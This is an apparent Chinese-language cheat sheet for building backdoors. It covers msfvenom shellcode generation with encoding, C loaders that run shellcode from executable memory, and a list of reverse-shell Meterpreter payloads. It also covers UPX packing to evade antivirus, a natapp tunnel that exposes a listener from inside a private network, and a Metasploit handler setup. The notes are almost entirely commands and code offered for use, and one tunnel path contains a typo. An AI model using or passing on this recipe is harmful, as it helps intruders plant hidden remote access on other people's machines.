后门生成
msfvenom -p LHOST LPORT -e -i -b -o -f
-p <payload type>
-e x86/shikata_ga_nai
-b '\x00'
-i <encode times>
-o <file name>
-f c
main()
{
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}
unsigned char buf[] =
"shellcode is here";
main()
{
( (void(*)(void))&buf)();
}
常用payload
windows/meterpreter/reverse_tcp
linux/x86/shell_reverse_tcp
java/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
加壳免杀
upx
内网穿透
注册natapp账号,并配置端口
chmod +x natapp
mv natapp /usr/local/natapp/natapp
cd /uar/local/natapp/
nohup ./natapp -authtoken=xxxx -log=stdout &
ps -ef|grep natapp
测试
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST=127.0.0.1
set LPORT=666